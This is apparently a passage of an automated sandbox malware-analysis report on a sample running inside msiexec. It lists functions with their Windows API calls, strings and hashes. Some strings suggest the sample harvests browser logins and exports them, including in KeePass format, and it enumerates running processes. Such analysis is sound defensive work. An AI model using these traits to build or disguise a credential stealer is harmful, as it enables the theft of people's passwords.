                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    • API String ID: 1607361635-601624466
                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 2000436516-3842416460
                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1043902810-0
                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                    • API String ID: 2899246560-1542517562
                                                                    • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                    • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                    • API String ID: 3330709923-517860148
                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040806A
                                                                    • memset.MSVCRT ref: 0040807F
                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                    • memset.MSVCRT ref: 004081E4
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                    • String ID: logins$null
                                                                    • API String ID: 2148543256-2163367763
                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • memset.MSVCRT ref: 004085CF
                                                                    • memset.MSVCRT ref: 004085F1
                                                                    • memset.MSVCRT ref: 00408606
                                                                    • strcmp.MSVCRT ref: 00408645
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                    • memset.MSVCRT ref: 0040870E
                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID: ---
                                                                    • API String ID: 3437578500-2854292027
                                                                    • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                    • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041087D
                                                                    • memset.MSVCRT ref: 00410892
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1010922700-0
                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                    • malloc.MSVCRT ref: 004186B7
                                                                    • free.MSVCRT ref: 004186C7
                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                    • free.MSVCRT ref: 004186E0
                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                    • malloc.MSVCRT ref: 004186FE
                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                    • free.MSVCRT ref: 00418716
                                                                    • free.MSVCRT ref: 0041872A
                                                                    • free.MSVCRT ref: 00418749
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                    • String ID: |A
                                                                    • API String ID: 3356672799-1717621600
                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                    • API String ID: 2081463915-1959339147
                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2012295524-70141382
                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 667068680-3953557276
                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1700100422-0
                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                    • String ID:
                                                                    • API String ID: 552707033-0
                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: %%0.%df
                                                                    • API String ID: 3473751417-763548558
                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
